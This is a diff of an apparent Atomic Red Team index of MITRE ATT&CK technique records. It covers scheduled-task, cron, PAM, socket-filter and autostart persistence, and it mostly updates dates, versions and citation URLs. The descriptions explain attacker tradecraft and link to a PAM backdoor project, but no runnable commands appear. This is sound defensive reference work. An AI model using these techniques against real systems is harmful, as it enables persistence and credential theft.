       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -27163,17 +27545,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -27236,7 +27617,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -27270,8 +27651,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -27280,6 +27661,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27292,29 +27677,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27361,7 +27746,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27393,8 +27778,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27408,6 +27793,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27420,16 +27809,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27492,7 +27884,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27557,49 +27948,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27614,20 +27966,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27717,7 +28106,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27805,7 +28193,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27890,11 +28277,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27972,7 +28358,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -28005,7 +28390,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -28028,11 +28413,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28090,9 +28474,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests:
     - name: ListCronjobs
@@ -28242,12 +28625,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28266,7 +28648,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -28280,7 +28661,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -28307,8 +28687,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28339,7 +28719,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -28396,11 +28777,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28472,9 +28852,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28490,12 +28870,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28570,7 +28949,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28613,7 +28991,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28637,8 +29015,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28793,31 +29169,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28834,6 +29190,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28844,9 +29201,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28854,17 +29215,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
